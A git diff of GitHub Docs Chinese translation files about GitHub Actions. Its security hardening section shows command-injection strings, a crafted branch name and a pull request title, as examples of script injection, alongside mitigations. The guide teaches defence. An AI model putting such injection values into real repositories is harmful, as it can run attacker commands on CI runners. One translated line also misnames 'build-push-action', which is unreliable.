+## Usage policy

-除了使用限制外，还必须确保使用 [GitHub 服务条款](/free-pro-team@latest/github/site-policy/github-terms-of-service/) 中的 {% data variables.product.prodname_actions %}。 有关 {% data variables.product.prodname_actions %} 特定条款的更多信息，请参阅 [GitHub 附加产品条款](/free-pro-team@latest/github/site-policy/github-additional-product-terms#a-actions-usage)。
+In addition to the usage limits, you must ensure that you use {% data variables.product.prodname_actions %} within the [GitHub Terms of Service](/free-pro-team@latest/github/site-policy/github-terms-of-service/). For more information on {% data variables.product.prodname_actions %}-specific terms, see the [GitHub Additional Product Terms](/free-pro-team@latest/github/site-policy/github-additional-product-terms#a-actions-usage).
 {% endif %}

 {% ifversion fpt or ghes > 3.3 or ghec %}
@@ -75,36 +75,36 @@ There are some limits on {% data variables.product.prodname_actions %} usage whe

 {% data reusables.actions.reusable-workflows-ghes-beta %}

-If you reuse a workflow, billing is always associated with the caller workflow. Assignment of {% data variables.product.prodname_dotcom %}-hosted runners is always evaluated using only the caller's context. The caller cannot use {% data variables.product.prodname_dotcom %}-hosted runners from the called repository.
+If you reuse a workflow, billing is always associated with the caller workflow. Assignment of {% data variables.product.prodname_dotcom %}-hosted runners is always evaluated using only the caller's context. The caller cannot use {% data variables.product.prodname_dotcom %}-hosted runners from the called repository. 

 For more information see, "[Reusing workflows](/actions/learn-github-actions/reusing-workflows)."
 {% endif %}

-## 构件和日志保留策略
+## Artifact and log retention policy

-您可以为仓库、组织或企业帐户配置构件和日志保留期。
+You can configure the artifact and log retention period for your repository, organization, or enterprise account.

 {% data reusables.actions.about-artifact-log-retention %}

-更多信息请参阅：
+For more information, see:

- “[管理仓库的 {% data variables.product.prodname_actions %} 设置](/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-github-actions-settings-for-a-repository#configuring-the-retention-period-for-github-actions-artifacts-and-logs-in-your-repository)”
- “[配置 {% data variables.product.prodname_actions %} 构件和日志在您的组织中的保留期](/organizations/managing-organization-settings/configuring-the-retention-period-for-github-actions-artifacts-and-logs-in-your-organization)”
- "[在企业中执行 {% data variables.product.prodname_actions %} 的策略](/admin/policies/enforcing-policies-for-your-enterprise/enforcing-policies-for-github-actions-in-your-enterprise#enforcing-a-policy-for-artifact-and-log-retention-in-your-enterprise)"
+- "[Managing {% data variables.product.prodname_actions %} settings for a repository](/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-github-actions-settings-for-a-repository#configuring-the-retention-period-for-github-actions-artifacts-and-logs-in-your-repository)"
+- "[Configuring the retention period for {% data variables.product.prodname_actions %} for artifacts and logs in your organization](/organizations/managing-organization-settings/configuring-the-retention-period-for-github-actions-artifacts-and-logs-in-your-organization)"
+- "[Enforcing policies for {% data variables.product.prodname_actions %} in your enterprise](/admin/policies/enforcing-policies-for-your-enterprise/enforcing-policies-for-github-actions-in-your-enterprise#enforcing-a-policy-for-artifact-and-log-retention-in-your-enterprise)"

-## 禁用或限制仓库或组织的 {% data variables.product.prodname_actions %}
+## Disabling or limiting {% data variables.product.prodname_actions %} for your repository or organization

 {% data reusables.actions.disabling-github-actions %}

-更多信息请参阅：
- “[管理仓库的 {% data variables.product.prodname_actions %} 设置](/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-github-actions-settings-for-a-repository)”
- "[对组织禁用或限制 {% data variables.product.prodname_actions %}](/organizations/managing-organization-settings/disabling-or-limiting-github-actions-for-your-organization)"
- "[在企业中执行 {% data variables.product.prodname_actions %} 的策略](/admin/policies/enforcing-policies-for-your-enterprise/enforcing-github-actions-policies-for-your-enterprise#enforcing-a-policy-for-artifact-and-log-retention-in-your-enterprise)"
+For more information, see:
+- "[Managing {% data variables.product.prodname_actions %} settings for a repository](/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-github-actions-settings-for-a-repository)"
+- "[Disabling or limiting {% data variables.product.prodname_actions %} for your organization](/organizations/managing-organization-settings/disabling-or-limiting-github-actions-for-your-organization)"
+- "[Enforcing policies for {% data variables.product.prodname_actions %} in your enterprise](/admin/policies/enforcing-policies-for-your-enterprise/enforcing-github-actions-policies-for-your-enterprise#enforcing-a-policy-for-artifact-and-log-retention-in-your-enterprise)"

-## 禁用和启用工作流程
+## Disabling and enabling workflows

-您可以在 {% data variables.product.prodname_dotcom %} 上启用和禁用仓库中的个别工作流程。
+You can enable and disable individual workflows in your repository on {% data variables.product.prodname_dotcom %}.

 {% data reusables.actions.scheduled-workflows-disabled %}

-更多信息请参阅“[禁用和启用工作流程](/actions/managing-workflow-runs/disabling-and-enabling-a-workflow)。
+For more information, see "[Disabling and enabling a workflow](/actions/managing-workflow-runs/disabling-and-enabling-a-workflow)."
--- a/translations/zh-CN/content/actions/managing-issues-and-pull-requests/index.md
+++ b/translations/zh-CN/content/actions/managing-issues-and-pull-requests/index.md
@@ -1,7 +1,7 @@
 ---
-title: Managing issues and pull requests
-shortTitle: Managing issues and pull requests
-intro: 'You can automatically manage your issues and pull requests using {% data variables.product.prodname_actions %} workflows.'
+title: 管理议题和拉取请求
+shortTitle: 管理议题和拉取请求
+intro: '您可以使用 {% data variables.product.prodname_actions %} 工作流程自动管理议题和拉取请求。'
 versions:
  fpt: '*'
  ghes: '*'
--- a/translations/zh-CN/content/actions/publishing-packages/index.md
+++ b/translations/zh-CN/content/actions/publishing-packages/index.md
@@ -1,7 +1,7 @@
 ---
 title: 发布包
 shortTitle: 发布包
-intro: 'You can automatically publish packages using {% data variables.product.prodname_actions %}.'
+intro: '您可以使用 {% data variables.product.prodname_actions %} 自动发布包。'
 versions:
  fpt: '*'
  ghes: '*'
--- a/translations/zh-CN/content/actions/publishing-packages/publishing-docker-images.md
+++ b/translations/zh-CN/content/actions/publishing-packages/publishing-docker-images.md
@@ -118,7 +118,7 @@ jobs:
 * `password`：您可以使用自动生成的 `GITHUB_TOKEN` 密码作为密码。 更多信息请参阅“[使用 GITHUB_TOKEN 验证身份](/actions/automating-your-workflow-with-github-actions/authenticating-with-the-github_token)”。

 {% ifversion fpt or ghec %}
-The `metadata-action` option required for {% data variables.product.prodname_registry %} is:
+{% data variables.product.prodname_registry %} 需要的 `metadata-action` 选项包括：
 * `images`：您构建的 Docker 映像的命名空间和名称。
 {% endif %}

@@ -170,7 +170,7 @@ jobs:
            {% ifversion ghae %}docker.YOUR-HOSTNAME.com{% else %}docker.pkg.github.com{% endif %}{% raw %}/${{ github.repository }}/octo-image:${{ github.event.release.tag_name }}{% endraw %}
 ```

-The above workflow checks out the {% data variables.product.prodname_dotcom %} repository, uses the `login-action` to log in to the registry, and then uses the `build-push-action` action to: build a Docker image based on your repository's `Dockerfile`; push the image to the Docker registry, and apply the commit SHA and release version as image tags.
+上述工作流程检出 {% data variables.product.prodname_dotcom %} 仓库，使用 `login-action` 登录到注册表，然后使用 `build-push-action` 操作：基于仓库的 `Dockerfile` 构建 Docker 映像；将该映像推送到 Docker 注册表，然后提交 SHA 和发行版本应用为映像标记。
 {% endif %}

 ## 发布映像到 Docker Hub 和 {% data variables.product.prodname_registry %}
@@ -229,4 +229,4 @@ jobs:
          labels: {% raw %}${{ steps.meta.outputs.labels }}{% endraw %}
 ```

-上面的工作流程检出 {% data variables.product.prodname_dotcom %} 仓库，使用两次 `login-action` 操作登录两个注册表，然后使用 `metadata-action` 操作生成标记和标签。 Then the `build-push-action` action builds and pushes the Docker image to Docker Hub and the {% ifversion fpt or ghec %}{% data variables.product.prodname_container_registry %}{% else %}Docker registry{% endif %}.
+上面的工作流程检出 {% data variables.product.prodname_dotcom %} 仓库，使用两次 `login-action` 操作登录两个注册表，然后使用 `metadata-action` 操作生成标记和标签。 然后，`build-pow-action` 操作构建并推送 Docker 映像到 Docker Hub 和 {% ifversion fpt or ghec %}{% data variables.product.prodname_container_registry %}{% else %}Docker 注册表{% endif %}。
--- a/translations/zh-CN/content/actions/publishing-packages/publishing-java-packages-with-gradle.md
+++ b/translations/zh-CN/content/actions/publishing-packages/publishing-java-packages-with-gradle.md
@@ -105,7 +105,7 @@ jobs:
 ```

 {% data reusables.actions.gradle-workflow-steps %}
-1. Runs the [`gradle/gradle-build-action`](https://github.com/gradle/gradle-build-action) action with the `publish` argument to publish to the `OSSRH` Maven repository. `MAVEN_USERNAME` 环境变量将使用 `OSSRH_USERNAME` 密码的内容设置，而 `MAVEN_PASSWORD` 环境变量将使用 `OSSRH_TOKEN` 密码的内容设置。
+1. 运行具有 `publish` 参数的 [`gradle/gradle-build-action`](https://github.com/gradle/gradle-build-action) 操作，以发布到 `OSSRH` Maven 存储库。 `MAVEN_USERNAME` 环境变量将使用 `OSSRH_USERNAME` 密码的内容设置，而 `MAVEN_PASSWORD` 环境变量将使用 `OSSRH_TOKEN` 密码的内容设置。

   有关在工作流程中使用密码的更多信息，请参阅“[创建和使用加密密码](/actions/automating-your-workflow-with-github-actions/creating-and-using-encrypted-secrets)”。

--- a/translations/zh-CN/content/actions/publishing-packages/publishing-nodejs-packages.md
+++ b/translations/zh-CN/content/actions/publishing-packages/publishing-nodejs-packages.md
@@ -55,7 +55,7 @@ shortTitle: Node.js 包

 要根据工作流程中的 npm 注册表执行经过身份验证的操作，您需要将 npm 身份验证令牌作存储为密码。 例如，创建名为 `NPM_TOKEN` 的仓库密码。 更多信息请参阅“[创建和使用加密密码](/actions/automating-your-workflow-with-github-actions/creating-and-using-encrypted-secrets)”。

-By default, npm uses the `name` field of the *package.json* file to determine the name of your published package. 当发布到全局命名空间时，您只需要包含包名称。 For example, you would publish a package named `npm-hello-world-test` to `https://www.npmjs.com/package/npm-hello-world-test`.
+默认情况下，npm 使用 *package.json* 文件的 `name` 字段来确定已发布包的名称。 当发布到全局命名空间时，您只需要包含包名称。 例如，您要发布一个名为 `npm-hello-world-test` 的包到 `https://www.npmjs.com/package/npm-hello-world-test`。

 如果发布一个包含范围前缀的包，请将范围包含在 *package.json* 文件的名称中。 例如，如果 npm 范围前缀是 octocat 并且包名是 hello-world，则 *package.json* 文件中的 `name` 应为 `@octocat/hello-world`。 如果 npm 包使用范围前缀且包是公开的，则需使用选项 `npm publish --access public`。 这是 npm 需要用来防止有人无意中发布私有包的选项。

@@ -92,7 +92,7 @@ registry=https://registry.npmjs.org/
 always-auth=true
 ```

-Please note that you need to set the `registry-url` to `https://registry.npmjs.org/` in `setup-node` to properly configure your credentials.
+请注意，您需要在 `setup-node` 中将 `registry-url` 设置为 `https://registry.npmjs.org/`，才可正确配置凭据。

 ## 发布包到 {% data variables.product.prodname_registry %}

--- a/translations/zh-CN/content/actions/security-guides/automatic-token-authentication.md
+++ b/translations/zh-CN/content/actions/security-guides/automatic-token-authentication.md
@@ -1,5 +1,5 @@
 ---
-title: Automatic token authentication
+title: 自动令牌身份验证
 intro: '{% data variables.product.prodname_dotcom %} 提供一个令牌，可用于代表 {% data variables.product.prodname_actions %} 进行身份验证。'
 redirect_from:
  - /github/automating-your-workflow-with-github-actions/authenticating-with-the-github_token
@@ -11,7 +11,7 @@ versions:
  ghes: '*'
  ghae: '*'
  ghec: '*'
-shortTitle: Automatic token authentication
+shortTitle: 自动令牌身份验证
 ---

 {% data reusables.actions.enterprise-beta %}
@@ -29,7 +29,7 @@ shortTitle: Automatic token authentication

 ## 在工作流程中使用 `GITHUB_TOKEN`

-您可以使用标准语法引用密钥以使用 `GITHUB_TOKEN`：{%raw%}`${{ secrets.GITHUB_TOKEN }}`{% endraw %}。 Examples of using the `GITHUB_TOKEN` include passing the token as an input to an action, or using it to make an authenticated {% ifversion fpt or ghec %}{% data variables.product.prodname_dotcom %}{% else %}{% data variables.product.product_name %}{% endif %} API request.
+您可以使用标准语法引用密钥以使用 `GITHUB_TOKEN`：{%raw%}`${{ secrets.GITHUB_TOKEN }}`{% endraw %}。 使用 `GITHUB_TOKEN` 的示例包括将令牌作为操作的输入，或使用它来建立验证的 {% ifversion fpt or ghec %}{% data variables.product.prodname_dotcom %}{% else %}{% data variables.product.product_name %}{% endif %} API 请求。

 {% ifversion fpt or ghes > 3.1 or ghae or ghec %}
 {% note %}
@@ -78,7 +78,7 @@ jobs:
 有关 {% data variables.product.prodname_github_apps %} 可通过各种权限访问的 API 端点的信息，请参阅“[{% data variables.product.prodname_github_app %} 权限](/rest/reference/permissions-required-for-github-apps)”。

 {% ifversion fpt or ghes > 3.1 or ghae or ghec %}
-下表显示默认情况下授予 `GITHUB_TOKEN` 的权限。 People with admin permissions to an {% ifversion not ghes %}enterprise, organization, or repository,{% else %}organization or repository{% endif %} can set the default permissions to be either permissive or restricted. For information on how to set the default permissions for the `GITHUB_TOKEN` for your enterprise, organization, or repository, see "[Enforcing policies for {% data variables.product.prodname_actions %} in your enterprise](/admin/policies/enforcing-policies-for-your-enterprise/enforcing-github-actions-policies-for-your-enterprise#enforcing-a-policy-for-workflow-permissions-in-your-enterprise)," "[Disabling or limiting {% data variables.product.prodname_actions %} for your organization](/github/setting-up-and-managing-organizations-and-teams/disabling-or-limiting-github-actions-for-your-organization#setting-the-permissions-of-the-github_token-for-your-organization)," or "[Managing {% data variables.product.prodname_actions %} settings for a repository](/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-github-actions-settings-for-a-repository#setting-the-permissions-of-the-github_token-for-your-repository)."
+下表显示默认情况下授予 `GITHUB_TOKEN` 的权限。 对{% ifversion not ghes %}企业、组织或仓库、{% else %}组织或仓库{% endif %}具有管理权限的人可以设置默认权限为允许或限制。 有关如何为企业、组织或存储库设置 `GITHUB_TOKEN` 默认权限的信息，请参阅“[在企业中强制实施 {% data variables.product.prodname_actions %} 策略](/admin/policies/enforcing-policies-for-your-enterprise/enforcing-github-actions-policies-for-your-enterprise#enforcing-a-policy-for-workflow-permissions-in-your-enterprise)”、“[对组织禁用或限制 {% data variables.product.prodname_actions %}](/github/setting-up-and-managing-organizations-and-teams/disabling-or-limiting-github-actions-for-your-organization#setting-the-permissions-of-the-github_token-for-your-organization)”或“[管理存储库的 {% data variables.product.prodname_actions %} 设置](/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-github-actions-settings-for-a-repository#setting-the-permissions-of-the-github_token-for-your-repository)”。

 | 作用域      | 默认访问<br>（允许） | 默认访问<br>（限制） | 复刻的仓库的最大访问权限<br>            |
 | -------- | ------------------ | ------------------ | --------------------------------- |
@@ -141,4 +141,4 @@ jobs:

 ### 延伸阅读

- "[Resources in the REST API](/rest/overview/resources-in-the-rest-api#rate-limiting)"
+- "[REST API 中的资源](/rest/overview/resources-in-the-rest-api#rate-limiting)"
--- a/translations/zh-CN/content/actions/security-guides/security-hardening-for-github-actions.md
+++ b/translations/zh-CN/content/actions/security-guides/security-hardening-for-github-actions.md
@@ -1,7 +1,7 @@
 ---
-title: GitHub Actions 的安全强化
-shortTitle: 安全强化
-intro: '使用 {% data variables.product.prodname_actions %} 功能的良好安全实践。'
+title: Security hardening for GitHub Actions
+shortTitle: Security hardening
+intro: 'Good security practices for using {% data variables.product.prodname_actions %} features.'
 redirect_from:
  - /actions/getting-started-with-github-actions/security-hardening-for-github-actions
  - /actions/learn-github-actions/security-hardening-for-github-actions
@@ -19,56 +19,56 @@ miniTocMaxHeadingLevel: 3
 {% data reusables.actions.enterprise-beta %}
 {% data reusables.actions.enterprise-github-hosted-runners %}

-## 概览
+## Overview

-本指南介绍如何为某些 {% data variables.product.prodname_actions %} 功能配置安全强化。 如果不熟悉 {% data variables.product.prodname_actions %} 概念，请参阅“[GitHub 操作的核心概念](/actions/getting-started-with-github-actions/core-concepts-for-github-actions)”。
+This guide explains how to configure security hardening for certain {% data variables.product.prodname_actions %} features. If the {% data variables.product.prodname_actions %} concepts are unfamiliar, see "[Core concepts for GitHub Actions](/actions/getting-started-with-github-actions/core-concepts-for-github-actions)."

-## 使用密码
+## Using secrets

-敏感值绝不能以明文存储在工作流程文件中，而应存储为密码。 [Secrets](/actions/configuring-and-managing-workflows/creating-and-storing-encrypted-secrets) can be configured at the organization, repository, or environment level, and allow you to store sensitive information in {% data variables.product.product_name %}.
+Sensitive values should never be stored as plaintext in workflow files, but rather as secrets. [Secrets](/actions/configuring-and-managing-workflows/creating-and-storing-encrypted-secrets) can be configured at the organization, repository, or environment level, and allow you to store sensitive information in {% data variables.product.product_name %}.

-密码使用 [Libsodium 密封箱](https://libsodium.gitbook.io/doc/public-key_cryptography/sealed_boxes)，以使它们在到达 {% data variables.product.product_name %} 前被加密处理。 [使用 UI](/actions/configuring-and-managing-workflows/creating-and-storing-encrypted-secrets#creating-encrypted-secrets-for-a-repository) 或通过 [REST API](/rest/reference/actions#secrets) 提交密码时就会发生这种情况。 此客户端加密有助于最大程度地减少与 {% data variables.product.product_name %}基础架构中的意外日志记录相关的风险（例如，异常日志和请求日志等）。 密钥在上传后，{% data variables.product.product_name %} 可对其进行解密，以便它能够被注入工作流程运行时。
+Secrets use [Libsodium sealed boxes](https://libsodium.gitbook.io/doc/public-key_cryptography/sealed_boxes), so that they are encrypted before reaching {% data variables.product.product_name %}. This occurs when the secret is submitted [using the UI](/actions/configuring-and-managing-workflows/creating-and-storing-encrypted-secrets#creating-encrypted-secrets-for-a-repository) or through the [REST API](/rest/reference/actions#secrets). This client-side encryption helps minimize the risks related to accidental logging (for example, exception logs and request logs, among others) within {% data variables.product.product_name %}'s infrastructure. Once the secret is uploaded, {% data variables.product.product_name %} is then able to decrypt it so that it can be injected into the workflow runtime.

-为了帮助防止意外泄露，{% data variables.product.product_name %} 使用一种机制尝试对运行日志中显示的任何密码进行编校。 此编校会寻找任何已配置密码的精确匹配项，以及值的常见编码，如 Base64。 但是，由于密码值可以通过多种方式转换，因此不能保证此编校。 因此，你应该采取某些积极主动的步骤和良好的做法，以帮助确保密码得到编校， 并限制与密码相关的其他风险：
+To help prevent accidental disclosure, {% data variables.product.product_name %} uses a mechanism that attempts to redact any secrets that appear in run logs. This redaction looks for exact matches of any configured secrets, as well as common encodings of the values, such as Base64. However, because there are multiple ways a secret value can be transformed, this redaction is not guaranteed. As a result, there are certain proactive steps and good practices you should follow to help ensure secrets are redacted, and to limit other risks associated with secrets:

- **切勿将结构化数据用作密码**
-    - 结构化数据可能导致日志中的密码编校失败，因为编校很大程度上取决于查找特定密码值的完全匹配项。 例如，不要使用 JSON、XML 或 YAML（或类似）的 Blob 来封装密码值，否则会显著降低密码被正确编校的可能性。 而应为每个敏感值创建单独的密码。
- **注册工作流程中使用的所有密码**
-    - 如果密码用于生成工作流程中的另一个敏感值，则该生成的值应正式[注册为密码](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret)，使其出现在日志中时将会得到编校。 例如，如果使用私钥生成签名的 JWT 来访问 Web API，请确保将该 JWT 注册为密码，否则，如果它进入日志输出，则不会得到编校。
-    - 注册密码也适用于任何类型的转换/编码。 如果以某种方式（如 Base64 或 URL 编码）转换您的密码，请确保将新值也注册为密码。
- **审核如何处理密码**
-    - 审核密码的使用方式，以帮助确保按预期方式处理密码。 您可以通过检查执行工作流程的仓库的源代码并检查工作流程中使用的任何操作来进行审核。 例如，确认它们未发送到非预期主机，或明确打印到日志输出。
-    - 在测试有效/无效输入后查看工作流程的运行日志，并确认密码已正确编校或未显示。 您调用的命令或工具如何向 `STDOUT` 和 `STDERR` 发送错误并不总是很明显，密码随后可能会在错误日志中生成错误。 因此，在测试有效和无效的输入后，最好是手动查看工作流程日志。
- **使用最小范围的凭据**
-    - 确保工作流程中使用的凭据具有所需的最小权限，并请注意，任何对仓库具有写入权限的用户都可访问仓库中配置的所有密码。 {% ifversion fpt or ghes > 3.1 or ghae or ghec %}
-    - Actions 可以使用 `GITHUB_TOKEN` 从 `github.token` 上下文访问它。 更多信息请参阅“[上下文](/actions/learn-github-actions/contexts#github-context)”。 因此，您应该确保 `GITHUB_TOKEN` 获得所需的最低权限。 将 `GITHUB_TOKENN` 的默认权限设置为只读取仓库内容是良好的安全做法。 然后可以根据需要增加工作流程文件中个别任务的权限。 更多信息请参阅“[工作流程中的身份验证](/actions/reference/authentication-in-a-workflow#permissions-for-the-github_token)。 {% endif %}
- **审核并轮换注册密码**
-    - 定期查查已注册的密码，以确认它们仍是必需的。 删除不再需要的密码。
-    - 定期轮换密码，以减小泄露的密码有效的时间窗。
- **考虑要求对访问密码进行审查**
-    - 您可以使用所需的审查者来保护环境机密。 在审查者批准之前，工作流程作业无法访问环境机密。 For more information about storing secrets in environments or requiring reviews for environments, see "[Encrypted secrets](/actions/reference/encrypted-secrets)" and "[Using environments for deployment](/actions/deployment/using-environments-for-deployment)."
+- **Never use structured data as a secret**
+    - Structured data can cause secret redaction within logs to fail, because redaction largely relies on finding an exact match for the specific secret value. For example, do not use a blob of JSON, XML, or YAML (or similar) to encapsulate a secret value, as this significantly reduces the probability the secrets will be properly redacted. Instead, create individual secrets for each sensitive value.
+- **Register all secrets used within workflows**
+    - If a secret is used to generate another sensitive value within a workflow, that generated value should be formally [registered as a secret](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret), so that it will be redacted if it ever appears in the logs. For example, if using a private key to generate a signed JWT to access a web API, be sure to register that JWT as a secret or else it won’t be redacted if it ever enters the log output.
+    - Registering secrets applies to any sort of transformation/encoding as well. If your secret is transformed in some way (such as Base64 or URL-encoded), be sure to register the new value as a secret too.
+- **Audit how secrets are handled**
+    - Audit how secrets are used, to help ensure they’re being handled as expected. You can do this by reviewing the source code of the repository executing the workflow, and checking any actions used in the workflow. For example, check that they’re not sent to unintended hosts, or explicitly being printed to log output.
+    - View the run logs for your workflow after testing valid/invalid inputs, and check that secrets are properly redacted, or not shown. It's not always obvious how a command or tool you’re invoking will send errors to `STDOUT` and `STDERR`, and secrets might subsequently end up in error logs. As a result, it is good practice to manually review the workflow logs after testing valid and invalid inputs.
+- **Use credentials that are minimally scoped**
+    - Make sure the credentials being used within workflows have the least privileges required, and be mindful that any user with write access to your repository has read access to all secrets configured in your repository. {% ifversion fpt or ghes > 3.1 or ghae or ghec %}
+    - Actions can use the `GITHUB_TOKEN` by accessing it from the `github.token` context. For more information, see "[Contexts](/actions/learn-github-actions/contexts#github-context)." You should therefore make sure that the `GITHUB_TOKEN` is granted the minimum required permissions. It's good security practice to set the default permission for the `GITHUB_TOKEN` to read access only for repository contents. The permissions can then be increased, as required, for individual jobs within the workflow file. For more information, see "[Authentication in a workflow](/actions/reference/authentication-in-a-workflow#permissions-for-the-github_token)." {% endif %}
+- **Audit and rotate registered secrets**
+    - Periodically review the registered secrets to confirm they are still required. Remove those that are no longer needed.
+    - Rotate secrets periodically to reduce the window of time during which a compromised secret is valid.
+- **Consider requiring review for access to secrets**
+    - You can use required reviewers to protect environment secrets. A workflow job cannot access environment secrets until approval is granted by a reviewer. For more information about storing secrets in environments or requiring reviews for environments, see "[Encrypted secrets](/actions/reference/encrypted-secrets)" and "[Using environments for deployment](/actions/deployment/using-environments-for-deployment)."

-## 使用 `CODEOWNERS` 监控更改
+## Using `CODEOWNERS` to monitor changes

-您可以使用 `CODEOWNERS` 功能来控制如何更改您的工作流程文件。 例如，如果您所有的工作流程文件都存储在 `.github/workflows` 中，您可以将此目录添加到代码所有者列表，这样对这些文件的任何拟议更改都首先需要得到指定的审查者的批准。
+You can use the `CODEOWNERS` feature to control how changes are made to your workflow files. For example, if all your workflow files are stored in `.github/workflows`, you can add this directory to the code owners list, so that any proposed changes to these files will first require approval from a designated reviewer.

-更多信息请参阅“[关于代码所有者](/github/creating-cloning-and-archiving-repositories/about-code-owners)”。
+For more information, see "[About code owners](/github/creating-cloning-and-archiving-repositories/about-code-owners)."

-## 了解脚本注入的风险
+## Understanding the risk of script injections

-在创建工作流程 [custom actions](/actions/creating-actions/about-actions) 和 [composite actions](/actions/creating-actions/creating-a-composite-action) 操作时，您应该始终考虑您的代码是否会执行来自攻击者的不信任输入。 当攻击者将恶意命令和脚本添加到上下文时可能发生这种情况。 当您的工作流程运行时，这些字符串可能会被解释为代码，然后在运行器上执行。
+When creating workflows, [custom actions](/actions/creating-actions/about-actions), and [composite actions](/actions/creating-actions/creating-a-composite-action) actions, you should always consider whether your code might execute untrusted input from attackers. This can occur when an attacker adds malicious commands and scripts to a context. When your workflow runs, those strings might be interpreted as code which is then executed on the runner.

- 攻击者可以将他们自己的恶意内容添加到 [`github` 上下文](/actions/reference/context-and-expression-syntax-for-github-actions#github-context)中，应会该被视为潜在的不可信输入。 这些上下文通常以 `body`、`default_branch`、`email`、`head_ref`、`label`、`message`、`name`、`page_name`、`ref` 和 `title` 结束。  例如：`github.event.issue.title` 或 `github.event.pull_request.body`。
+ Attackers can add their own malicious content to the [`github` context](/actions/reference/context-and-expression-syntax-for-github-actions#github-context), which should be treated as potentially untrusted input. These contexts typically end with `body`, `default_branch`, `email`, `head_ref`, `label`, `message`, `name`, `page_name`,`ref`, and `title`.  For example: `github.event.issue.title`, or `github.event.pull_request.body`. 
+ 
+ You should ensure that these values do not flow directly into workflows, actions, API calls, or anywhere else where they could be interpreted as executable code. By adopting the same defensive programming posture you would use for any other privileged application code, you can help security harden your use of {% data variables.product.prodname_actions %}. For information on some of the steps an attacker could take, see ["Potential impact of a compromised runner](/actions/learn-github-actions/security-hardening-for-github-actions#potential-impact-of-a-compromised-runner)."

- 您应该确保这些值不会直接流入工作流程、操作、API 调用，或任何可能被解释为可执行代码的其它地方。 通过采用您将用于任何其他特权应用程序代码的相同防御编程姿态，，您可以帮助安全保护 {% data variables.product.prodname_actions %} 的使用。 有关攻击者可能采取的某些步骤的信息，请参阅“[受损运行器的潜在影响](/actions/learn-github-actions/security-hardening-for-github-actions#potential-impact-of-a-compromised-runner)”。
+In addition, there are other less obvious sources of potentially untrusted input, such as branch names and email addresses, which can be quite flexible in terms of their permitted content. For example, `zzz";echo${IFS}"hello";#` would be a valid branch name and would be a possible attack vector for a target repository.

-此外，还有其他不太明显的潜在不信任输入来源，如分支名称和电子邮件地址，这些输入在允许的内容方面可能相当灵活。 例如， `zz";echo${IFS}"hello";#` 将是一个有效的分支名称，并将成为目标仓库的可能攻击矢量。
+The following sections explain how you can help mitigate the risk of script injection.

-以下部分解释了如何帮助降低脚本注入的风险。
+### Example of a script injection attack

-### 脚本注入攻击示例
-
-脚本注入攻击可直接发生在工作流程的内联脚本中。 在下列示例中，操作使用表达式来测试拉取请求标题的有效性，但也增加了脚本注入的风险：
+A script injection attack can occur directly within a workflow's inline script. In the following example, an action uses an expression to test the validity of a pull request title, but also adds the risk of script injection:

 {% raw %}
 ```
@@ -85,23 +85,23 @@ miniTocMaxHeadingLevel: 3
 ```
 {% endraw %}

-此示例易受脚本注入的影响，因为 `run` 命令在运行器的临时 shell 脚本中执行。 在 shell 脚本运行之前。 {% raw %}`${{ }}`{% endraw %} 内的表达式被评估后替换为结果值， 这使它易受 shell 命令注入的攻击。
+This example is vulnerable to script injection because the `run` command executes within a temporary shell script on the runner. Before the shell script is run, the expressions inside {% raw %}`${{ }}`{% endraw %} are evaluated and then substituted with the resulting values, which can make it vulnerable to shell command injection. 

-要将命令注入此工作流程，攻击者可以创建标题为 `a"; ls $GITHUB_WORKSPACE"` 的拉取请求：
+To inject commands into this workflow, the attacker could create a pull request with a title of  `a"; ls $GITHUB_WORKSPACE"`:

-![PR 标题中的脚本注入示例](/assets/images/help/images/example-script-injection-pr-title.png)
+![Example of script injection in PR title](/assets/images/help/images/example-script-injection-pr-title.png)

-在此示例中，`"` 字符用于中断 {% raw %}`title="${{ github.event.pull_request.title }}"`{% endraw %} 语句， 允许在运行器上执行 `ls` 命令。 您可以在日志中看到 `ls` 命令的输出：
+In this example, the `"` character is used to interrupt the {% raw %}`title="${{ github.event.pull_request.title }}"`{% endraw %} statement, allowing the `ls` command to be executed on the runner. You can see the output of the `ls` command in the log:

-![脚本注入示例结果](/assets/images/help/images/example-script-injection-result.png)
+![Example result of script injection](/assets/images/help/images/example-script-injection-result.png)

-## 减少脚本注入攻击的良好做法
+## Good practices for mitigating script injection attacks

-有许多不同的方法可以帮助您降低脚本注入的风险：
+There are a number of different approaches available to help you mitigate the risk of script injection:

-### 使用操作而不是内联脚本（建议）
+### Using an action instead of an inline script (recommended)

-建议的方法是创建一个操作，将上下文值作为参数处理。 此方法不易受到注入攻击，因为上下文值不用于生成 shell 脚本，而是作为参数传递给该操作：
+The recommended approach is to create an action that processes the context value as an argument. This approach is not vulnerable to the injection attack, as the context value is not used to generate a shell script, but is instead passed to the action as an argument:

 {% raw %}
 ```
@@ -111,11 +111,11 @@ with:
 ```
 {% endraw %}

-### 使用中间环境变量
+### Using an intermediate environment variable

-对于内联脚本，处理不信任输入的首选方法是将表达式的值设置为中间环境变量。
+For inline scripts, the preferred approach to handling untrusted input is to set the value of the expression to an intermediate environment variable.

-以下示例使用 Bash 将 `github.event.pull_request.title` 值处理为环境变量：
+The following example uses Bash to process the `github.event.pull_request.title` value as an environment variable:

 {% raw %}
 ```
@@ -133,11 +133,11 @@ with:
 ```
 {% endraw %}

-在此示例中，尝试的脚本注入失败：
+In this example, the attempted script injection is unsuccessful:

-![缓减脚本注入示例](/assets/images/help/images/example-script-injection-mitigated.png)
+![Example of mitigated script injection](/assets/images/help/images/example-script-injection-mitigated.png)

-使用此方法， {% raw %}`${{ github.event.issue.title }}`{% endraw %} 表达式的值存储在内存中用作变量，并且不与脚本生成过程交互。 此外，考虑使用双引号 shell 变量来避免 [单词拆分](https://github.com/koalaman/shellcheck/wiki/SC2086)，但这是是写入shell 脚本[的许多一般性建议之一](https://mywiki.wooledge.org/BashPitfalls)，不是专门针对 {% data variables.product.prodname_actions %} 的。
